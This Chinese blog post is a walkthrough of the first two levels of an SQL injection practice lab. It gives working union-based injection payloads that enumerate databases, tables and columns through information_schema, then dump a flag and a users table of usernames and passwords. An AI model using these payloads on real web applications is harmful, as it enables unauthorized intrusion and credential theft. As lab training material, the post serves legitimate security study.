sql注入第一关和第二关

最新推荐文章于 2024-09-11 10:34:24 发布

将军的恩情还不完

最新推荐文章于 2024-09-11 10:34:24 发布

阅读量4.8k

点赞数 1

分类专栏：安全渗透文章标签： sql 数据库

本文链接：https://blog.csdn.net/plzdonotlietome/article/details/140933947

版权

4 篇文章 0 订阅

订阅专栏

第一关：

输入?id=1 正常

输入?id=1' 报错 ' .0 '

输入?id=1'--+ 正常

判断他是字符型注入闭合方式是:

?id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+

联合注入
爆出库：ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test

?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+

爆出表：flag

?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'--+

爆出列：id flag

?id=1' and 1=2 union select 1,2,group_concat(flag) from ctfshow.flag--+

第二关：

输入?id=1 正常

输入?id=1'报错

输入?id=1'--+ 报错

接下来查看哪些可以回显：

?id=-1 union select 1,2,3--+

查看数据库名称：

?id=-1 union select 1,databse(),3 --+

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

查看数据库中的表：

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

查看表中所有字段：

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'  and table_schema='security'--

查看数据：

?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+

关注

专栏目录